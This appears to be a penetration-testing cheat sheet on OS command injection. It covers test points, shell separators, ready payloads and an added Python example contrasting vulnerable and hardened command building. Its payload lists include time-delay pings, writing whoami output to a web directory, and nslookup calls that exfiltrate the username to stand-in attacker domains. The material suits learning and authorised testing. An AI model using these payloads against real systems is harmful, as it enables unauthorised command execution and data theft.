# OS command injection

## Where to test:

1. Some functionality is implemented by calling out to a shell command, passing user-supplied values such as the product and store IDs as arguments:

```
https://insecure-website.com/stockStatus?productID=381&storeID=29
```

On the server side this may be executed as:

```
stockreport.pl 381 29
```

If the IDs are concatenated into that command without validation, the application is vulnerable to OS command injection, for example:

```
stockreport.pl & echo aiwefwlguh & 29
```
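The two ways of building the `stockreport.pl` call described above, side by side, as an added example that is not part of the original page: the string-concatenation pattern that lets a shell separator in, and a hardened version that allow-lists numeric IDs and passes an argv list to `subprocess` with `shell=False`. The script name and the marker payload are taken from the page; the regex and helper names are assumptions.

```python
import re
import subprocess

# Report script from the page's example (path is an assumption).
STOCK_REPORT = "stockreport.pl"
# Allow-list for IDs: digits only, bounded length.
ID_PATTERN = re.compile(r"[0-9]{1,10}")
# Shell metacharacters from the page's separator lists, for log/WAF review.
SEPARATOR_PATTERN = re.compile(r"[;&|`\n]|\$\(")


def build_command_vulnerable(product_id: str, store_id: str) -> str:
    """The pattern the page describes: IDs concatenated into one shell string.
    A value such as "381 & echo aiwefwlguh &" is parsed by the shell as
    separators, so the injected command runs."""
    return f"{STOCK_REPORT} {product_id} {store_id}"


def is_valid_id(value: str) -> bool:
    """True only for a purely numeric ID; any metacharacter fails the match."""
    return ID_PATTERN.fullmatch(value) is not None


def build_command_safe(product_id: str, store_id: str) -> list[str]:
    """argv list for subprocess with shell=False. The OS receives separate
    arguments and no shell parses them, so separators are inert even before
    validation; the allow-list additionally rejects anything non-numeric."""
    for value in (product_id, store_id):
        if not is_valid_id(value):
            raise ValueError(f"rejected non-numeric id: {value!r}")
    return [STOCK_REPORT, product_id, store_id]


def run_stock_report(product_id: str, store_id: str) -> subprocess.CompletedProcess:
    """Hardened invocation: validated argv, no shell, bounded runtime."""
    argv = build_command_safe(product_id, store_id)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)


def looks_injected(value: str) -> bool:
    """Detection helper: flags request parameters carrying shell separators."""
    return SEPARATOR_PATTERN.search(value) is not None


if __name__ == "__main__":
    # Constructed request values: a legitimate pair and the page's marker payload.
    print(build_command_vulnerable("381 & echo aiwefwlguh &", "29"))
    print(build_command_safe("381", "29"))
    print(looks_injected("381 & echo aiwefwlguh &"))
```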

## Ways of injecting:

1. Identify (inject a harmless marker and check whether it is echoed back):

```bash
& echo aiwefwlguh & 
```

2. Command separators that work on both Windows and Unix-based systems:

```bash
command1 ; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2
```

3. Command separators that work only on Unix-based systems:

```bash
;
Newline (0x0a or \n)
`injected command `
$(injected command )
```

### Payloads:

```bash
& ping -c 10 127.0.0.1 &
|ping -n 11 127.0.0.1||ping -c 11 127.0.0.1
& whoami > /var/www/static/whoami.txt &
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
```

## Example:

```bash
email=x||ping+-c+10+127.0.0.1||
email=x|ping -n 11 127.0.0.1||ping -c 11 127.0.0.1
email=||whoami>/var/www/images/output.txt||
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
```

### Useful Commands:

```
Linux          Windows
whoami         whoami
uname -a       ver
ifconfig       ipconfig /all
netstat -an    netstat -an
ps -ef         tasklist
```
